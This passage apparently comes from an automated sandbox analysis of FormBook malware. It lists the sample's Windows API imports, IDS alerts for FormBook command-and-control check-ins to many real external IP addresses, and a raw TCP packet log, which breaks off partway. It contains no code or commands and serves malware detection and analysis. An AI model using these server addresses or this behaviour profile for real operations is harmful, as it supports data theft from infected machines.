                                MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishGreat Britain
                                EnglishUnited States

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-09-23T14:36:57.420097+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74970381.2.196.1980TCP
                                2024-09-23T14:37:14.218178+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749704103.21.221.480TCP
                                2024-09-23T14:37:16.852379+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749705103.21.221.480TCP
                                2024-09-23T14:37:19.356148+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749707103.21.221.480TCP
                                2024-09-23T14:37:21.770309+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749708103.21.221.480TCP
                                2024-09-23T14:37:28.123635+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74970938.47.232.19680TCP
                                2024-09-23T14:37:30.783145+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74971038.47.232.19680TCP
                                2024-09-23T14:37:33.546333+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74971138.47.232.19680TCP
                                2024-09-23T14:37:36.664205+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74971238.47.232.19680TCP
                                2024-09-23T14:37:42.195520+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749713188.114.97.380TCP
                                2024-09-23T14:37:45.170542+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749714188.114.97.380TCP
                                2024-09-23T14:37:48.552290+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749715188.114.97.380TCP
                                2024-09-23T14:37:51.081454+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749716188.114.97.380TCP
                                2024-09-23T14:37:56.856092+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749717195.110.124.13380TCP
                                2024-09-23T14:37:59.468926+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749718195.110.124.13380TCP
                                2024-09-23T14:38:02.168708+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749719195.110.124.13380TCP
                                2024-09-23T14:38:04.655185+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749720195.110.124.13380TCP
                                2024-09-23T14:38:10.578766+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749721162.0.238.24680TCP
                                2024-09-23T14:38:13.137368+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749722162.0.238.24680TCP
                                2024-09-23T14:38:15.731793+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749723162.0.238.24680TCP
                                2024-09-23T14:38:18.235963+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749724162.0.238.24680TCP
                                2024-09-23T14:38:24.704835+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749725198.50.252.6480TCP
                                2024-09-23T14:38:27.900283+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749726198.50.252.6480TCP
                                2024-09-23T14:38:30.166580+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749727198.50.252.6480TCP
                                2024-09-23T14:38:32.686553+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749728198.50.252.6480TCP
                                2024-09-23T14:38:39.360229+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74972985.159.66.9380TCP
                                2024-09-23T14:38:42.467299+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74973085.159.66.9380TCP
                                2024-09-23T14:38:45.014148+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74973185.159.66.9380TCP
                                2024-09-23T14:38:46.718567+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74973285.159.66.9380TCP
                                2024-09-23T14:38:52.649879+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749733142.250.186.5180TCP
                                2024-09-23T14:38:55.445163+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749734142.250.186.5180TCP
                                2024-09-23T14:38:57.763962+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749735142.250.186.5180TCP
                                2024-09-23T14:39:00.365212+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749736142.250.186.5180TCP
                                2024-09-23T14:39:14.931402+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749737199.59.243.22780TCP
                                2024-09-23T14:39:16.524563+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749738199.59.243.22780TCP
                                2024-09-23T14:39:19.088135+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749739199.59.243.22780TCP
                                2024-09-23T14:39:21.619286+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749740199.59.243.22780TCP
                                2024-09-23T14:39:27.378471+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74974162.149.128.4080TCP
                                2024-09-23T14:39:27.378471+02002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.74974162.149.128.4080TCP
                                2024-09-23T14:39:29.906818+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74974262.149.128.4080TCP
                                2024-09-23T14:39:32.458953+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74974362.149.128.4080TCP
                                2024-09-23T14:39:35.074653+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74974462.149.128.4080TCP
                                2024-09-23T14:39:40.589680+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7497453.33.130.19080TCP
                                2024-09-23T14:39:44.067449+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7497463.33.130.19080TCP
                                2024-09-23T14:39:45.831765+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7497473.33.130.19080TCP
                                2024-09-23T14:39:48.399721+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.7497483.33.130.19080TCP
                                2024-09-23T14:39:54.540490+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749749154.198.53.3680TCP
                                2024-09-23T14:39:57.105227+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749750154.198.53.3680TCP
                                2024-09-23T14:39:59.935924+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749751154.198.53.3680TCP
                                2024-09-23T14:40:02.265246+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749752154.198.53.3680TCP
                                2024-09-23T14:40:08.418181+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749753154.38.114.20580TCP
                                2024-09-23T14:40:11.121460+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749754154.38.114.20580TCP
                                2024-09-23T14:40:14.093213+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749755154.38.114.20580TCP
                                2024-09-23T14:40:16.346281+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749756154.38.114.20580TCP
                                2024-09-23T14:40:21.927956+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74975784.32.84.3280TCP
                                2024-09-23T14:40:24.493137+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74975884.32.84.3280TCP
                                2024-09-23T14:40:27.052809+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74975984.32.84.3280TCP
                                2024-09-23T14:40:30.937112+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74976084.32.84.3280TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Sep 23, 2024 14:36:56.738081932 CEST4970380192.168.2.781.2.196.19
                                Sep 23, 2024 14:36:56.743088961 CEST804970381.2.196.19192.168.2.7
                                Sep 23, 2024 14:36:56.743230104 CEST4970380192.168.2.781.2.196.19
                                Sep 23, 2024 14:36:56.753988028 CEST4970380192.168.2.781.2.196.19
                                Sep 23, 2024 14:36:56.758992910 CEST804970381.2.196.19192.168.2.7
                                Sep 23, 2024 14:36:57.419692039 CEST804970381.2.196.19192.168.2.7
                                Sep 23, 2024 14:36:57.419893980 CEST804970381.2.196.19192.168.2.7
                                Sep 23, 2024 14:36:57.420097113 CEST4970380192.168.2.781.2.196.19
                                Sep 23, 2024 14:36:57.423331976 CEST4970380192.168.2.781.2.196.19
                                Sep 23, 2024 14:36:57.428231001 CEST804970381.2.196.19192.168.2.7
                                Sep 23, 2024 14:37:12.920990944 CEST4970480192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:12.925952911 CEST8049704103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:12.926069975 CEST4970480192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:12.936741114 CEST4970480192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:12.941629887 CEST8049704103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:14.218002081 CEST8049704103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:14.218050957 CEST8049704103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:14.218090057 CEST8049704103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:14.218122959 CEST8049704103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:14.218157053 CEST8049704103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:14.218178034 CEST4970480192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:14.218189955 CEST8049704103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:14.218224049 CEST8049704103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:14.218255997 CEST8049704103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:14.218290091 CEST8049704103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:14.218307972 CEST4970480192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:14.218341112 CEST8049704103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:14.218378067 CEST4970480192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:14.218422890 CEST4970480192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:14.222953081 CEST8049704103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:14.223047018 CEST4970480192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:14.451533079 CEST4970480192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:15.471019983 CEST4970580192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:15.476108074 CEST8049705103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:15.476203918 CEST4970580192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:15.490607023 CEST4970580192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:15.495513916 CEST8049705103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:16.852230072 CEST8049705103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:16.852261066 CEST8049705103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:16.852271080 CEST8049705103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:16.852348089 CEST8049705103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:16.852379084 CEST4970580192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:16.852427959 CEST4970580192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:16.852440119 CEST8049705103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:16.852446079 CEST8049705103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:16.852452993 CEST8049705103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:16.852458954 CEST8049705103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:16.852488041 CEST4970580192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:16.852514982 CEST4970580192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:16.852621078 CEST8049705103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:16.852627993 CEST8049705103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:16.852647066 CEST8049705103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:16.852694035 CEST4970580192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:16.852710962 CEST4970580192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:16.998059988 CEST4970580192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:18.017568111 CEST4970780192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:18.022648096 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:18.023938894 CEST4970780192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:18.036112070 CEST4970780192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:18.041229963 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:18.041343927 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:19.355966091 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:19.355983973 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:19.355998039 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:19.356062889 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:19.356076002 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:19.356148005 CEST4970780192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:19.356168985 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:19.356184006 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:19.356197119 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:19.356203079 CEST4970780192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:19.356210947 CEST4970780192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:19.356237888 CEST4970780192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:19.356291056 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:19.356303930 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:19.356344938 CEST4970780192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:19.358659983 CEST8049707103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:19.358736992 CEST4970780192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:19.545100927 CEST4970780192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:20.563651085 CEST4970880192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:20.569071054 CEST8049708103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:20.569148064 CEST4970880192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:20.576164007 CEST4970880192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:20.580993891 CEST8049708103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:21.769678116 CEST8049708103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:21.770009041 CEST8049708103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:21.770308971 CEST4970880192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:21.775413036 CEST4970880192.168.2.7103.21.221.4
                                Sep 23, 2024 14:37:21.782828093 CEST8049708103.21.221.4192.168.2.7
                                Sep 23, 2024 14:37:27.228110075 CEST4970980192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:27.233036995 CEST804970938.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:27.233143091 CEST4970980192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:27.333808899 CEST4970980192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:27.338721991 CEST804970938.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:28.123538017 CEST804970938.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:28.123553991 CEST804970938.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:28.123635054 CEST4970980192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:28.842164993 CEST4970980192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:29.864505053 CEST4971080192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:29.869441986 CEST804971038.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:29.869533062 CEST4971080192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:29.880053043 CEST4971080192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:29.884860039 CEST804971038.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:30.782752037 CEST804971038.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:30.783070087 CEST804971038.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:30.783144951 CEST4971080192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:31.388748884 CEST4971080192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:32.409569025 CEST4971180192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:32.414566040 CEST804971138.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:32.414657116 CEST4971180192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:32.428009987 CEST4971180192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:32.432832003 CEST804971138.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:32.432918072 CEST804971138.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:33.546189070 CEST804971138.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:33.546211004 CEST804971138.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:33.546220064 CEST804971138.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:33.546333075 CEST4971180192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:33.935677052 CEST4971180192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:34.954355955 CEST4971280192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:34.960283995 CEST804971238.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:34.960424900 CEST4971280192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:34.967307091 CEST4971280192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:34.972249985 CEST804971238.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:36.663703918 CEST804971238.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:36.663717985 CEST804971238.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:36.663733959 CEST804971238.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:36.663927078 CEST804971238.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:36.664205074 CEST4971280192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:36.664205074 CEST4971280192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:36.664376020 CEST804971238.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:36.664443016 CEST4971280192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:36.671381950 CEST4971280192.168.2.738.47.232.196
                                Sep 23, 2024 14:37:36.676192045 CEST804971238.47.232.196192.168.2.7
                                Sep 23, 2024 14:37:41.710701942 CEST4971380192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:41.715600967 CEST8049713188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:41.715713024 CEST4971380192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:41.729139090 CEST4971380192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:41.733964920 CEST8049713188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:42.194437027 CEST8049713188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:42.195379019 CEST8049713188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:42.195519924 CEST4971380192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:43.232501030 CEST4971380192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:44.251498938 CEST4971480192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:44.712871075 CEST8049714188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:44.713084936 CEST4971480192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:44.726186991 CEST4971480192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:44.731106997 CEST8049714188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:45.169430017 CEST8049714188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:45.170454025 CEST8049714188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:45.170542002 CEST4971480192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:46.232665062 CEST4971480192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:47.271646023 CEST4971580192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:48.072127104 CEST8049715188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:48.072423935 CEST4971580192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:48.084470034 CEST4971580192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:48.089380026 CEST8049715188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:48.089682102 CEST8049715188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:48.552010059 CEST8049715188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:48.552223921 CEST8049715188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:48.552289963 CEST4971580192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:49.591893911 CEST4971580192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:50.616836071 CEST4971680192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:50.621946096 CEST8049716188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:50.622062922 CEST4971680192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:50.630011082 CEST4971680192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:50.634983063 CEST8049716188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:51.080991983 CEST8049716188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:51.081403971 CEST8049716188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:51.081454039 CEST4971680192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:51.084527016 CEST4971680192.168.2.7188.114.97.3
                                Sep 23, 2024 14:37:51.089318037 CEST8049716188.114.97.3192.168.2.7
                                Sep 23, 2024 14:37:56.171080112 CEST4971780192.168.2.7195.110.124.133
                                Sep 23, 2024 14:37:56.178028107 CEST8049717195.110.124.133192.168.2.7
                                Sep 23, 2024 14:37:56.178114891 CEST4971780192.168.2.7195.110.124.133
                                Sep 23, 2024 14:37:56.231558084 CEST4971780192.168.2.7195.110.124.133
                                Sep 23, 2024 14:37:56.236464024 CEST8049717195.110.124.133192.168.2.7
                                Sep 23, 2024 14:37:56.855519056 CEST8049717195.110.124.133192.168.2.7
                                Sep 23, 2024 14:37:56.856025934 CEST8049717195.110.124.133192.168.2.7
                                Sep 23, 2024 14:37:56.856091976 CEST4971780192.168.2.7195.110.124.133
                                Sep 23, 2024 14:37:57.749207020 CEST4971780192.168.2.7195.110.124.133
                                Sep 23, 2024 14:37:58.767005920 CEST4971880192.168.2.7195.110.124.133
                                Sep 23, 2024 14:37:58.771936893 CEST8049718195.110.124.133192.168.2.7
                                Sep 23, 2024 14:37:58.772056103 CEST4971880192.168.2.7195.110.124.133
                                Sep 23, 2024 14:37:58.783951044 CEST4971880192.168.2.7195.110.124.133
                                Sep 23, 2024 14:37:58.788824081 CEST8049718195.110.124.133192.168.2.7
                                Sep 23, 2024 14:37:59.468683004 CEST8049718195.110.124.133192.168.2.7
                                Sep 23, 2024 14:37:59.468765020 CEST8049718195.110.124.133192.168.2.7
                                Sep 23, 2024 14:37:59.468925953 CEST4971880192.168.2.7195.110.124.133
                                Sep 23, 2024 14:38:00.295357943 CEST4971880192.168.2.7195.110.124.133
                                Sep 23, 2024 14:38:01.315864086 CEST4971980192.168.2.7195.110.124.133
                                Sep 23, 2024 14:38:01.320882082 CEST8049719195.110.124.133192.168.2.7
                                Sep 23, 2024 14:38:01.321105003 CEST4971980192.168.2.7195.110.124.133
                                Sep 23, 2024 14:38:01.333888054 CEST4971980192.168.2.7195.110.124.133
                                Sep 23, 2024 14:38:01.339492083 CEST8049719195.110.124.133192.168.2.7
